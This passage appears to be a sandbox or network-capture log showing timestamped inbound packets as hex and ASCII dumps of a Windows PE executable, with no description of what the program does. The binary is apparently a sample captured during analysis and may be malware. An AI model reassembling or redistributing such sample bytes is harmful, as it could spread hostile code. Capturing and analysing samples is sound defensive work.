2022-01-14 12:49:38 UTC	449	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 94 d3 ee 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 4e 00 00 00 06 00 00 00 00 00 00 00 61 03 00 00 20 00 00 00 80 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0Na @@
2022-01-14 12:49:38 UTC	451	IN	Data Raw: 00 00 00 00 7c 0e 9b 1b 6a 0e 9b 13 01 00 00 00 5d 00 00 00 01 70 10 00 00 00 a6 32 6d 03 00 fb 50 f0 1f fd fd 8c 67 92 69 ff b4 54 c2 1d f0 78 4d fc ea cd cf 8f ed 27 6e a1 9c bf 02 99 12 37 17 08 36 35 ca 8a 47 80 81 bf bc 1d 7d 7d 09 e5 81 b8 4e 42 b3 24 5d d4 5b 5f cb 04 b9 ef da 2f 15 28 96 06 b7 84 1f 85 2d 98 01 d1 ae a4 03 25 7d a4 46 66 06 33 ec 94 1e d6 aa 04 a5 92 7d 1f 4c 8e c7 38 5b 52 81 f0 c8 eb 9c 1e d8 4a be 6e 00 00 0a 03 a2 02 00 c8 00 00 00 00 ea 01 00 d2 02 00 00 00 2f d9 92 00 00 0a 79 37 00 00 49 8e eb 05 00 46 70 32 01 00 06 e4 a6 25 00 00 01 cc a0 70 f7 aa 05 00 42 75 c8 25 00 00 01 f4 b9 c0 a6 78 63 03 00 42 4c 5a 48 49 00 82 4f 00 d9 24 00 00 01 3a 4c a2 37 00 49 27 00 00 01 7b 4c 70 44 00 00 0a d6 ea 21 00 a6 00 00 00 00 48 21 Data Ascii: \|j]p2mPgiTxM'n765G}}NB$][_/(-%}Ff3}L8[RJn/y7IFp2%pBu%xcBLZHIO$:L7I'{LpD!H!
2022-01-14 12:49:38 UTC	452	IN	Data Raw: 49 26 00 00 01 62 b6 75 70 62 00 00 01 25 f3 84 a6 2a 00 00 01 62 43 88 be 25 00 00 01 25 59 a5 c8 62 00 00 01 62 6b fd d2 62 00 00 01 25 76 38 d9 62 00 00 01 62 b6 6d 49 62 00 00 01 25 f3 73 70 25 00 00 01 62 43 75 a6 5f 00 00 01 25 59 84 be 26 00 00 01 62 6b 88 c8 26 00 00 01 25 76 a5 d2 62 00 00 01 62 b6 fd d9 53 00 00 02 25 f3 38 49 62 00 00 01 62 43 6d 70 62 00 00 01 25 59 73 a6 5f 00 00 01 62 6b 75 be 27 00 00 01 25 76 84 c8 5f 00 00 01 62 b6 88 d2 27 00 00 01 25 f3 a5 d9 1e 00 00 02 62 43 fd 49 26 00 00 01 25 59 38 70 62 00 00 01 62 6b 6d a6 62 00 00 01 25 76 73 be 62 00 00 01 62 b6 75 c8 5f 00 00 01 25 f3 84 d2 5f 00 00 01 62 43 88 d9 62 00 00 01 25 59 a5 49 5f 00 00 01 62 6b fd 70 62 00 00 01 25 76 38 a6 62 00 00 01 62 b6 6d be 26 00 00 01 25 f3 Data Ascii: I&bupb%*bC%%Ybbkb%v8bbmIb%sp%bCu_%Y&bk&%vbbS%8IbbCmpb%Ys_bku'%v_b'%bCI&%Y8pbbkmb%vsbbu_%_bCb%YI_bkpb%v8bbm&%
2022-01-14 12:49:38 UTC	453	IN	Data Raw: 00 01 3a a0 d9 4f 71 03 00 42 38 70 25 00 00 01 7b b9 b8 49 29 71 03 00 42 4c 46 be 18 00 00 00 37 35 00 48 35 00 c8 25 00 00 01 cc bd c0 70 a2 7a 03 00 42 6d d9 25 00 00 01 f4 c7 c4 a6 48 73 03 00 42 4c 5a 82 49 00 a2 67 00 70 24 00 00 01 3a 4c ea 01 00 a6 24 00 00 01 7b 4c be 44 00 00 0a b4 48 3d 00 c8 00 00 00 00 82 3d 00 66 d2 26 00 00 01 cc d9 3f 00 00 0a e4 a2 3d 00 49 00 00 00 00 70 40 00 00 0a 03 95 0f 00 ea 3d 00 a6 04 00 00 00 be 40 00 00 0a e4 37 28 00 48 28 00 c8 24 00 00 01 f4 82 3d 00 6c d2 26 00 00 01 3a d9 27 00 00 01 7b 49 01 00 00 00 fc 70 01 00 00 00 08 a6 01 00 00 00 42 be 25 00 00 01 cc f2 be 39 75 03 00 42 73 d2 25 00 00 01 f4 f5 15 c8 da a2 03 00 42 4c a7 49 05 00 00 00 70 00 00 00 00 d9 e9 7b 03 00 29 be 01 00 00 00 49 e2 6a 03 00 Data Ascii: :OqB8p%{I)qBLF75H5%pzBm%HsBLZIgp$:L${LDH==f&?=Ip@=@7(H($=l&:'{IpB%9uBs%BLIp{)Ij
2022-01-14 12:49:38 UTC	455	IN	Data Raw: 79 03 00 42 4c 46 a2 04 00 49 25 00 00 01 cc a0 a6 ee af 03 00 42 88 a6 25 00 00 01 f4 b9 15 be 0b 64 03 00 42 4c 5a ea 04 00 c8 25 00 00 01 3a bd d2 a8 b1 03 00 42 a5 d9 25 00 00 01 7b c7 80 d9 93 b1 03 00 42 4c a7 d9 a8 a6 03 00 95 4f 00 a6 0c 00 00 00 be 28 00 00 01 3f 37 21 00 c8 00 00 00 00 95 37 00 49 74 ab 05 00 e3 00 00 62 00 00 01 d9 00 00 00 00 a3 47 f3 49 72 00 00 04 1f 70 00 00 00 00 a6 62 00 00 01 45 be 62 00 00 01 e5 c8 00 00 00 00 fb 48 5c 00 d2 03 00 00 00 d9 26 00 00 01 45 49 74 20 48 76 70 00 00 00 00 1d a6 01 00 00 00 42 be 25 00 00 01 cc f2 a6 da eb 05 00 42 fd d2 25 00 00 01 f4 f5 b8 be 67 a6 03 00 42 4c 46 51 43 49 72 00 00 04 63 70 24 00 00 00 a6 62 00 00 01 45 be bd 35 00 00 ee c8 62 00 00 01 e6 d2 00 00 00 00 5a 82 44 00 d9 01 00 Data Ascii: yBLFI%B%dBLZ%:B%{BLO(?7!7ItbGIrpbEbH\&EIt HvpB%B%gBLFQCIrcp$bE5bZD
2022-01-14 12:49:38 UTC	456	IN	Data Raw: 4c 95 3c 00 48 3c 00 82 23 00 66 d2 26 00 00 01 cc d9 01 00 00 00 53 49 01 00 00 00 c1 70 01 00 00 00 42 a6 25 00 00 01 f4 5f be 19 ab 03 00 42 fd c8 25 00 00 01 3a 67 c4 c8 2d b1 03 00 42 4c 5a a2 02 00 ea 01 00 d9 02 00 00 00 2f 48 05 00 49 28 00 00 01 7b 70 29 00 00 01 6f 82 02 00 a2 01 00 a6 02 00 00 00 2f be 01 00 00 00 4c ea 05 00 c8 08 00 00 00 16 d2 28 00 00 01 cc d9 29 00 00 01 74 48 01 00 49 01 00 00 00 4c 37 01 00 82 01 00 70 00 02 00 00 a6 01 00 00 00 91 be 01 00 00 00 08 c8 01 00 00 00 42 d2 25 00 00 01 f4 77 70 f5 73 03 00 42 38 49 25 00 00 01 3a 89 15 a6 8e eb 05 00 42 4c a7 a2 03 00 ea 3f 00 6d a6 01 00 00 00 4c 95 3f 00 be 73 00 00 00 c8 29 00 00 01 26 d9 59 64 03 00 e3 01 00 62 00 00 01 00 00 00 00 73 d9 00 00 00 00 12 43 49 62 00 00 01 Data Ascii: L<H<#f&SIpB%_B%:g-BLZ/HI({p)o/L()tHIL7pB%wpsB8I%:BL?mL?s)&YdbsCIb
2022-01-14 12:49:38 UTC	458	IN	Data Raw: ea 04 00 6d 70 07 00 00 00 a6 01 00 00 00 1d be 01 00 00 00 08 c8 01 00 00 00 42 d2 25 00 00 01 7b 77 a6 8c 7c 03 00 42 73 49 25 00 00 01 cc 89 80 be 85 7c 03 00 42 4c fb a3 c8 d1 ab 03 00 46 be 02 00 00 00 60 d2 b5 ab 03 00 4c 0c 5a 47 d2 2c 00 00 00 d9 62 00 00 01 3f 49 72 00 00 04 0e 59 70 00 00 00 00 a7 48 01 00 82 28 00 4c 37 01 00 a2 01 00 ea 5a 00 a6 01 00 00 00 1d be 01 00 00 00 c1 c8 01 00 00 00 42 d2 25 00 00 01 f4 a0 d2 6b 6c 03 00 42 75 49 25 00 00 01 3a b9 b8 d9 39 75 03 00 42 4c e3 48 49 00 82 1f 00 a6 24 00 00 01 7b 4c a2 30 00 be 27 00 00 01 cc 4c c8 44 00 00 0a b3 ea 41 00 d2 00 00 00 00 48 41 00 22 d9 26 00 00 01 f4 49 3f 00 00 0a 03 82 25 00 a2 41 00 70 00 00 00 00 a6 40 00 00 0a e4 be 9f 00 00 06 1a 95 2f 00 ea 25 00 48 41 00 c8 04 00 Data Ascii: mpB%{w\|BsI%\|BLF`LZG,b?IrYpH(L7ZB%klBuI%:9uBLHI${L0'LDAHA"&I?%Ap@/%HA
2022-01-14 12:49:38 UTC	459	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-01-14 12:49:38 UTC	460	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-01-14 12:49:38 UTC	462	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-01-14 12:49:38 UTC	463	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-01-14 12:49:38 UTC	464	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-01-14 12:49:38 UTC	466	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-01-14 12:49:38 UTC	467	IN	Data Raw: 14 d3 9d b5 43 0a 0d 79 f7 5c f8 12 49 7d 22 d6 54 c8 25 b9 b5 d0 a9 d6 85 2f bf be 13 1b 5a 40 4d 66 a7 ba d9 b3 20 45 1d 0d d7 6a 34 09 dc 2d cc 00 65 b4 27 a9 cd 3a c8 de 69 b0 36 1f 8d 2d cd 75 8a a8 f4 4c f3 81 99 59 65 ad d2 ea e1 1b dd 1f f4 45 11 e7 51 78 e1 17 21 7c b0 a2 1b c8 8f 2c 40 e4 75 95 bf a0 de df fc c7 19 bf 6e 1c 18 00 61 64 8d 6a 70 87 50 aa dc 30 a2 b2 5b 80 50 96 bb 4b 37 a1 1f 08 df 1c 84 e6 23 69 96 aa be 1a 53 68 6d b6 49 79 b0 76 93 d7 0b 12 a1 72 be 27 13 af 31 f8 e5 9b fe ff 86 17 f2 5c 64 b6 63 3b 42 66 0e 00 13 30 08 00 12 00 00 00 00 00 00 00 73 b3 00 00 06 14 20 90 6b 03 00 28 24 01 00 06 26 2a 00 80 03 00 00 20 00 00 04 00 00 00 a2 28 00 a6 24 00 00 01 cc ea 3d 00 55 be 26 00 00 01 f4 c8 27 00 00 01 3a f0 37 43 00 48 43 Data Ascii: Cy\I}"T%/Z@Mf Ej4-e':i6-uLYeEQx!\|,@unadjpP0[PK7#iShmIyvr'1\dc;Bf0s k($&* ($=U&':7CHC
2022-01-14 12:49:38 UTC	468	IN	Data Raw: 00 0a 03 70 9f 00 00 06 79 95 17 00 48 71 00 82 4d 00 a6 04 00 00 00 be 40 00 00 0a e4 c8 9f 00 00 06 93 37 5b 00 a2 71 00 ea 4d 00 d2 08 00 00 00 d9 40 00 00 0a 03 49 9f 00 00 06 1a 95 3a 00 48 73 00 82 49 00 a2 17 00 70 24 00 00 01 7b 4c a6 44 00 00 0a b4 ea 5b 00 be 9d 00 00 06 79 48 3a 00 c8 01 00 00 00 fc b8 d2 01 00 00 00 42 d9 25 00 00 01 cc 5f d2 40 ad 03 00 42 38 70 25 00 00 01 f4 67 c0 d9 38 ad 03 00 42 4c e3 82 08 00 be ae 00 00 0a 93 c8 25 00 00 01 3a 77 d9 42 79 03 00 42 6d d9 25 00 00 01 7b 89 c4 49 d3 75 03 00 42 4c fb a2 10 00 ea 1b 00 48 72 00 82 1b 00 70 13 00 00 01 45 a6 ab 00 00 0a 1a be 13 00 00 01 6f a2 1b 00 c8 01 00 00 00 4c 37 1b 00 ea 1b 00 48 10 00 e0 d2 26 00 00 01 cc d9 01 00 00 00 31 49 01 00 00 00 08 70 01 00 00 00 42 a6 25 Data Ascii: pyHqM@7[qM@I:HsIp${LD[yH:B%_@B8p%g8BL%:wByBm%{IuBLHrpEoL7H&1IpB%
2022-01-14 12:49:38 UTC	470	IN	Data Raw: 4c e3 35 0e a2 1c e8 39 41 73 1c e6 eb cc aa 99 7b 33 71 66 45 cc 23 98 b7 30 44 61 30 c2 04 84 b0 08 c2 11 24 23 1f 46 9f 8c ad 19 19 33 b7 66 be cd 45 9b 54 36 3d 6c e0 d8 6d b1 9d 61 97 c3 20 87 f3 0e 83 1c 9a 39 26 73 eb e6 83 cc cf 99 5d 33 19 66 2d cc 50 98 e1 30 2c 61 12 c2 e0 84 89 08 aa 11 0b 23 be 46 46 8d 85 19 f5 33 91 66 d7 cd 28 9b 30 36 5d 6c ae d8 49 00 00 00 00 95 19 00 82 60 00 a2 4d 00 22 70 26 00 00 01 7b 4c 37 60 00 ea 60 00 a6 27 00 00 01 cc 48 27 00 be 24 00 00 01 f4 c8 01 00 00 00 91 d2 01 00 00 00 c1 d9 01 00 00 00 42 49 25 00 00 01 3a 5f 49 19 a7 03 00 42 38 a6 25 00 00 01 7b 67 15 70 03 af 03 00 42 4c fb 20 0e a4 1c f6 39 56 73 45 e6 a4 cc e5 99 7d 33 6b 66 59 cc 20 98 e3 30 40 61 24 c2 55 84 fc 08 ff 11 2f 23 17 46 98 8c e4 19 Data Ascii: L59As{3qfE#0Da0$#F3fET6=lma 9&s]3f-P0,a#FF3f(06]lI`M"p&{L7``'H'$BI%:_IB8%{gpBL 9VsE}3kfY 0@a$U/#F
2022-01-14 12:49:38 UTC	471	IN	Data Raw: 29 68 b3 b4 ac 8f 7e a9 09 f0 8b 0c d2 18 54 8a d5 7b 3e 68 69 0d 41 59 8c ca 39 09 2b 45 b6 17 05 31 1f 53 24 fe 30 6a 30 32 65 e3 8c 46 9b 58 b5 e2 71 9e e8 56 73 34 3e 77 fd b1 78 ab 79 bd 26 c6 d8 96 2d d6 3f c3 42 9c 92 1f 65 84 f3 9d 4c 33 4e bb 74 c4 c6 25 b9 cd a2 3f 2e fb ea 53 6f 20 96 88 f7 36 5c a6 18 f8 bc c4 1d 87 66 c5 6d 78 f0 10 a6 07 c2 41 8d 50 37 4b 47 cf 49 9d f2 5b cd bf 8b 30 71 04 43 34 65 83 f1 4a ac 0a f5 dc ff 4d fa 76 0d 31 92 b7 1e aa 26 fd 2d b9 69 f2 c7 bb 0b 94 fd f7 73 00 67 01 6c a4 eb f8 a1 23 1b e5 b6 88 59 72 6d 6d cd 89 7f d1 68 74 ad b0 31 03 8c e4 4c 06 c6 39 0d 42 e9 3c 8b cf 12 f3 7e f7 db 62 34 24 28 2f b5 2e 4f 73 2a b8 a2 c2 2c 68 b0 6a 9d 01 e7 44 dd 5b 1f bd 37 60 d0 af d2 a3 f7 cd c5 3c d6 ea 86 74 97 cc ab Data Ascii: )h~T{>hiAY9+E1S$0j02eFXqVs4>wxy&-?BeL3Nt%?.So 6\fmxAP7KGI[0qC4eJMv1&-isgl#Yrmmht1L9B<~b4$(/.Os*,hjD[7`<t
2022-01-14 12:49:38 UTC	472	IN	Data Raw: 56 52 c3 53 52 21 7a fa df c3 2e c3 33 34 9a c9 95 d3 d1 91 65 b0 da 62 37 4b 7b 42 de 63 39 2e d1 be d0 23 4f 3f 58 e7 12 58 2f 8d 5c 98 e6 0e 5b b4 4c 49 52 15 cd 98 3b 47 af e2 07 63 7f a3 0b a7 40 1a 11 d3 02 7f c0 fc 1a fe 2a 9d 82 ae eb 94 45 ea 25 6b 4f 6b e0 df 11 67 cc e9 01 5c 69 76 a4 46 7c 53 75 e2 45 32 e6 63 6f 7a e4 e5 46 a2 0f 8c b3 1b 94 55 e4 77 1a 25 f2 39 94 a4 9e cf 1a eb 83 a8 dd 38 83 c4 7d a6 af b8 11 1a b6 14 93 66 d3 5c 42 48 91 17 94 83 b2 a4 18 80 40 50 ce e1 b4 6e f3 8b c7 80 ab f6 8d 5c 6e 8e ae 43 b1 0d d5 c8 25 4c b9 59 be 31 88 74 a2 b5 88 2a 8f e9 e5 a2 ad df 07 85 b0 85 3c 96 a0 38 15 88 11 79 d7 79 99 d0 2b 8b 02 98 1f cb 6f 8a 1c 4e 1f a9 57 99 9c a8 75 39 8b 3b 4f 0f 67 c8 11 51 04 ac ab e9 9d fc a6 65 96 cd bf f5 71 Data Ascii: VRSR!z.34eb7K{Bc9.#O?XX/\[LIR;Gc@E%kOkg\ivF\|SuE2cozFUw%98}f\BH@Pn\nC%LY1t<8yy+oNWu9;OgQeq
2022-01-14 12:49:38 UTC	474	IN	Data Raw: b6 d8 e9 95 73 37 5c 6d 7d 07 4f 9d 9e 7e 65 e4 8e 23 b9 9e 74 bd e8 23 16 5b cc 70 cc 43 ea 00 19 dc 92 83 3d af b6 d7 ba 35 57 f0 c3 9f ec a3 90 2c 73 be 20 21 9d 98 ec 21 5f d8 f0 40 aa 1c 80 59 d9 24 8c aa 33 c4 c1 b4 5f 43 d4 8e 43 1c e1 9f b4 f9 69 6f e6 fd c4 5f 26 33 be 03 95 13 45 d7 ae b3 87 93 15 9c f1 2b ed 8c db 0a 36 1b 1d 7c 7f 7d b7 1a 20 25 80 9a 16 32 f3 48 10 4a ab 2a 7c 71 15 12 11 22 ff 30 e2 5b 27 7f d1 75 70 21 30 33 06 9e 07 d6 30 ab 3d 7c 50 9d 90 46 8f 54 2e 41 8b 89 3f 7d c1 a8 aa d7 a4 a4 c8 7b 80 4f e4 77 fc 11 3d 62 0b 7f eb 96 f8 4d 85 ba dc 63 f2 c3 25 3a 38 36 a3 c7 09 38 aa a6 00 0e 49 8e 79 83 3c d4 f6 8e af be b1 47 c3 07 64 34 2b 6e 07 7a 86 3c 4f bb c7 dc 8d 38 f6 d3 ee 63 0b 63 c8 e1 b4 de 57 d6 6c 20 df 66 5e 38 cd Data Ascii: s7\m}O~e#t#[pC=5W,s !!_@Y$3_CCio_&3E+6\|} %2HJ*\|q"0['up!030=\|PFT.A?}{Ow=bMc%:868Iy<Gd4+nz<O8ccWl f^8
2022-01-14 12:49:38 UTC	475	IN	Data Raw: 27 10 c0 4f 3f df 94 b6 b3 39 8f c5 f6 26 11 0e bb b1 68 f4 e8 58 11 11 11 c7 ea ee 2b 85 79 0e 5d d3 98 ab 2c 3f 53 2d 00 2f 2b cc 95 29 e7 63 27 c7 c8 11 80 4d d1 39 dc ff ce ec 03 eb de 7b c1 70 10 c2 79 95 72 52 03 f8 da ed 9b f0 d5 f3 d8 7b de 99 7e 18 4c 9a 22 7a 49 6a 03 0c 39 b1 17 0f 91 b7 83 c4 f0 07 76 e2 b0 94 3e 50 43 56 a1 d2 7c d8 5e 6b 07 17 9b ce 70 18 3e 67 e7 e6 84 9d 83 6d 58 8e 45 ba 9d c2 e1 ee e9 91 82 83 75 6b f7 05 d5 73 24 82 a4 7e 63 52 33 66 5b 39 d3 63 81 95 2a b1 c3 a8 b4 ce 6f 60 b8 3e b2 e8 e7 c8 56 94 ae ea cf cb 75 c9 c2 89 21 6a ea 2a 12 96 5d fc ae 03 30 a8 1b b5 71 e5 b1 de 50 56 b9 17 9f 45 0e a2 3e 05 cc 89 1c 6c 1a e2 22 1e c9 8b 70 62 19 03 bc 1b 8d db 27 9f 4d 43 aa ff 70 8a dd de 02 5c 61 f4 37 b8 aa 84 63 46 81 Data Ascii: 'O?9&hX+y],?S-/+)c'M9{pyrR{~L"zIj9v>PCV\|^kp>gmXEuks$~cR3f[9co`>Vu!j]0qPVE>l"pb'MCp\a7cF
2022-01-14 12:49:38 UTC	476	IN	Data Raw: f3 dc bb 76 2b e9 10 1f 62 92 c6 ae 8d ed d6 b6 e6 50 e1 33 a0 5c 19 e6 87 38 7f 4b 94 69 2e 68 69 30 bd 88 89 57 cd 74 7a ea 02 83 93 94 e7 b2 79 61 7b 73 0a e8 34 b4 48 08 bb bd 41 ce ca cd 41 b4 b9 a7 80 74 c3 b4 ad 6c 4f bf ae a4 48 ea 6e a6 f7 ee 74 1c f9 06 27 d6 dc 83 c4 f9 4c 63 6b 65 46 9d 36 a9 85 cc 46 d0 fb 23 69 2b a9 15 a8 c7 c6 19 61 8f 93 e2 71 66 26 2c 41 07 55 60 a6 30 cd d3 99 82 5a 37 8a 11 b8 8e ef a1 e7 6d b7 e9 8b c8 81 0e 85 11 7d b1 d6 a1 75 a0 68 59 ef 63 61 37 6e af d9 5d c5 6f e9 83 18 b6 94 02 cc 23 5d 9a 45 14 c8 ce 81 7c 30 0f 92 bc c0 40 b6 25 5d 26 c9 d3 ba d4 b7 66 53 45 36 79 e9 62 07 48 b7 d5 80 e3 fd d1 4b 9d 43 d5 26 a4 36 96 11 d5 b3 cd 66 15 00 76 79 7e ce b6 8c 4a eb 7b 74 cf bb 87 42 39 b7 73 57 25 9b 65 e4 0e 81 Data Ascii: v+bP3\8Ki.hi0Wtzya{s4HAAtlOHnt'LckeF6F#i+aqf&,AU`0Z7m}uhYca7n]o#]E\|0@%]&fSE6ybHKC&6fvy~J{tB9sW%e
2022-01-14 12:49:38 UTC	478	IN	Data Raw: 01 3e 21 57 6e 85 1d 60 cd a1 2f b7 e7 76 33 26 00 04 16 87 2d 43 1d df 77 7c 72 ea 81 16 4b c2 eb 6d 4a 2b e1 cc c5 79 00 48 4c fa dc f4 c4 c7 57 1a 4f d3 34 72 f1 fe 7f ff 8f 66 61 f5 94 06 7b dc da 35 7e 0e b7 d4 bf f0 95 f8 b2 1c 49 61 ca 75 7c 38 15 69 d2 7a 0f d5 81 5d 63 a1 ca 9b 2c 99 59 3f 3e 27 0b bc 32 d3 44 01 75 fb 76 f7 40 30 dc c4 3b f9 96 03 58 d5 62 8a 3e 39 f9 a4 2a d8 08 44 23 7e 8d 65 ad 2f 35 80 0b e5 d2 85 49 1b 77 77 17 7f 0d e9 45 1c 15 d2 7c cb b5 c6 cf c5 ee 78 bc d2 76 fc f6 6c b1 40 15 0c 08 bf c0 7d 12 cc 3c ce 13 9e 38 e2 d2 eb 41 66 ee 7e 91 a3 c9 f8 ee 82 c2 64 2b 06 7e 08 3a 2f 8d e1 e5 61 25 2b b1 88 ae 21 af 81 4a 8d 2b 5d 4e dc ec 4e 2a 64 e7 ac 91 0d 26 ad 37 d3 6e 22 2e ec f2 26 cd c8 eb d5 79 86 7d 80 af dd 55 76 ad Data Ascii: >!Wn`/v3&-Cw\|rKmJ+yHLWO4rfa{5~Iau\|8iz]c,Y?>'2Duv@0;Xb>9D#~e/5IwwE\|xvl@}<8Af~d+~:/a%+!J+]NNd&7n".&y}Uv
